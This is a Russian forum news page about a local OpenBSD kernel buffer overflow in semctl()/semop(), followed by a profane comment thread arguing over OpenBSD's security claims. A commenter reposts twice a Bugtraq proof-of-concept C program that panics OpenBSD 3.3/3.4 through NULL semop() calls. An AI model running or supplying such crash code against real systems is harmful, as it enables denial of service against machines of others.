LINUX.ORG.RU

Локальное переполнение буфера в ядре OpenBSD


0

0

Переполнение буфера обнаружена в OpenBSD в функциях semctl() и semop(). Локальный пользователь может аварийно завершить работу ядра.

Локальный пользователь может представить специально обработанные параметры к semctl(2) или semop(2) ситемному вызову, чтобы аварийно завершить работу системы. Проблема связанна с неправильной проверкой границ в 'sysv_sem.c'.

Патчи:
ftp://ftp.openbsd.org/pub/OpenBSD/pat... ftp://ftp.openbsd.org/pub/OpenBSD/pat...

>>> Источник

а недавно проскакивал локальный сплоит с возможностью выполнения кода с root правами ;) Здаёт obsd ;)

BigBug
()
Ответ на: комментарий от BigBug

А ты не гонишь паренек?

Может быть ссылочку дашь, мне очень интересно.

Sun-ch
()
Ответ на: комментарий от anonymous

Да это мелочь.

Ну уронишь ты сервак.

Дык приедет злобный пьяный дядя админ, и будет долго лупить

железной линейкой твою розовую попку.

Sun-ch
()

Странная у народа реакция. Можно подумать, что в Linux никогда не находили ничего подобного. Не позорьтесь, линуксоиды :-))

anonymous
()
Ответ на: комментарий от anonymous

>Странная у народа реакция. Можно подумать, что в Linux никогда не
>находили ничего подобного. Не позорьтесь, линуксоиды :-))

Находили и находят, только есть одно но, линукс никогда, в отличии
от obsd, гарантии на безопастность не давал...

anonymous
()
Ответ на: комментарий от anonymous

где openbsd дает гарантии на безопасность ? если мне не изменяет склероз, гарантии там такие же, как и у Openwall GNU/*/Linux, т.е. никаких, кроме твоего лично доверия к разработчикам дистрибутива.

AlexGor
()
Ответ на: комментарий от anonymous

Ну пусть не гарантии, а заявления с претензией на "особую" защищенность,
типа "only 1 remote exploit in the default install" ;))
"default install" = kernel ;))
Ведь именно эта цель была основной при старте проекта obsd.
И много крикунов мутили воду в форумах, прославляя супербезопасную ОС.
Поэтому не грех кидать камни в их огород. Пусть посмотрят в зеркало на
свои кривые рожи ;)

anonymous
()
Ответ на: комментарий от anonymous

Ну вот и имеем на сейчас 2 дыры в default install за Хз сколько лет, а у остальных - десятки и сотни. Разница существенная.

netch
()

опенбзд как говном было так и умрет им

ananymous
()
Ответ на: комментарий от Sun-ch

>Да это мелочь. Ну уронишь ты сервак. Дык приедет злобный пьяный дядя админ, и будет долго лупить железной линейкой твою розовую попку.

Нет, ни хера не так. Для начала я получу на чужом серваке shell а потом уж и завалю.

Жаль только в интернете не найдешь серваков с obsd.

anonymous
()
Ответ на: комментарий от anonymous

>Нет, ни хера не так. Для начала я получу на чужом серваке shell а потом уж и завалю.

Заипешься. Отвечаю.

>Жаль только в интернете не найдешь серваков с obsd.

Не так уж и мало. Просто они прикидыватся другими ос.

Sun-ch
()
Ответ на: комментарий от anonymous

По ссылке кто ходил? Русский язык кто понимает??

< < Программа: OpenBSD 3.3, 3.4

< Опасность: Низкая < Наличие эксплоита: Нет

Кого поимели-то???

loki
()
Ответ на: комментарий от Sun-ch

>Заипешься. Отвечаю.

Вот тебе простой пример

Сервер виртуального web хостинга. Некий клиент поставил себе форум iconboard, этот замечательный скрипт уязвим - позволяет через куки выполнять системные команды.

Все отлично работает на серверах крупнейшего российского хостера - у него freebsd.

Я не очень хорошо знаком с bsd системами, поможет ли chroot ?

anonymous
()
Ответ на: комментарий от anonymous

Ну и что?

Ну задефейсят ему сайт или потрут. Сам себе буратино.

Главное что нельзя повысить уровень привелегий в системе.

Sun-ch
()
Ответ на: комментарий от Sun-ch

>Главное что нельзя повысить уровень привелегий в системе.

В данном конкретном случае привилегии не повышаются, но сервак валится. Этого для злоумышленника будет вполне достаточно.

anonymous
()
Ответ на: комментарий от Sun-ch

Ну да, честные люди так и написали:

> It is possible for a local user to cause a crash via sysctl(3) with certain arguments.

Эксплоита пока нет, не спорю.

anonymous
()
Ответ на: комментарий от Sun-ch

В догонку:

From: noir@uberhax0r.net To: bugtraq@securityfocus.com Subject: yet another panic() in OpenBSD a project lacking the basic QA and unit testing and here is the outcome:

#include <stdio.h> #include <sys/types.h> #include <sys/sem.h> #include <sys/ipc.h>

int main() { int i;

for(i = 0; i < 0x40; i++) semop(i, (struct sembuf *) NULL, 0);

}

PANIC in OpenBSD 3.3 and 3.4 is confirmed.

Так кто там прячет свои openbsd ? :)

anonymous
()
Ответ на: комментарий от Sun-ch

В догонку:

From: noir@uberhax0r.net
To: bugtraq@securityfocus.com
Subject: yet another panic() in OpenBSD
a project lacking the basic QA and unit testing and here is the outcome:

#include <stdio.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <sys/ipc.h>

int
main()
{
    int i;

        for(i = 0; i < 0x40; i++)
                semop(i, (struct sembuf *) NULL, 0);

}


PANIC in OpenBSD 3.3 and 3.4 is confirmed.


Так кто там прячет свои openbsd ? :) 

anonymous
()
Ответ на: комментарий от Sun-ch

С патчами все понятно, было бы странно если бы их не выпустили. Речь идет о том что Вы назвали локальные уязвимости мелочью.

>Да это мелочь. Ну уронишь ты сервак. Дык приедет злобный пьяный дядя админ, и будет долго лупить железной линейкой твою розовую попку.

Уязвимости того же порядка что и ptrace. Я не прав ?

anonymous
()
Ответ на: комментарий от anonymous

Нет не прав. Там был локал рут, тут локал дос. Разницу чуешь? Кстати кто-то тут писал про 2 remote hole in the default install... Можно их перечислить?

tokza
()

http://www.openbsd.org/
"Only one remote hole in the default install, in more than 7 years!"
Интересно, а в "default install" что наружу смотрит? Ничего?
Так если сделать такой же линукс, то можно смело писать
"The only one remotely unbreakable system, in more than 10 years!"

2Сан-часть
ну ты и пиздобол всё же.

anonymous
()
Ответ на: комментарий от anonymous

> "Only one remote hole in the default install, in more than 7 years!"
> Интересно, а в "default install" что наружу смотрит? Ничего?
> Так если сделать такой же линукс, то можно смело писать
> "The only one remotely unbreakable system, in more than 10 years!"

В defaul install входят:
sshd
sendmail
inetd

Это то, что "светится" наружу. Плюс ядро, конечно же.
inetd.conf:
- ident (tcp/tcp6)
- 127.0.0.1:comsat & [::1]:comsat
[internal]:
- daytime (tcp/tcp6)
- time (tcp/tcp6)

И вот в этом год-два назад (не помню точно) нашли удаленную
дырку. Не нужно ведь напоминать уважаемому сообществу, чем
отличается локальная уязвимость от удаленной?
Насчет приведенных эксплоитов. Да, они работают, правда,
у меня сработал только один (uvm_glue.c который). Однако в
CVS это, конечно же, уже исправлено, секьюритилаб немного
тормозит.

van

anonymous
()
Ответ на: комментарий от anonymous

Бля, как жить когда вокруг столько идиотов?

Проблема с ibcs2 была известна и пофиксена еще в сентябре

ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-013.txt.asc

А теперь давай расскажи зачем в ядре нужна опция COMPAT_IBCS2?

Может ты думаешь, что люди из OpenBSD team не читают SA от фри или

нетбсд?

Выучи английский и читай оригинальные источники, а то выглядишь

как мудак, ну честное слово.

Sun-ch
()
Ответ на: комментарий от anonymous


man 8 COMPAT_IBCS2 -

Intel Binary Compatibility Standard 2,

Binaries are supported from SCO UNIX and other systems derived from UNIX

System V Release 3.

Ну просто гиперуязвимость, гы, гы , гы.

Ну карапузы признавайтесь, кто из вас ворованные бинарники от SCO

исполняет на OpenBSD :)


Sun-ch
()
Ответ на: комментарий от anonymous

> sshd

Этот за 7 лет имел больше чем 1 удаленный эксплойт (в сочетании с openssl)

> sendmail

Эта хрень вааще побила все мировые рекорды по количеству дыр

> inetd

От этого говна все нормальный ОС отказываются давно, ибо inetd - первый
кандидат для DoS.

anonymous
()
Ответ на: комментарий от anonymous

Факты в студию. Причем касаемые именно OpenBSD.

anonymous
()
Ответ на: комментарий от anonymous

А что там с inetd? Ну ка расскажи :-))

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.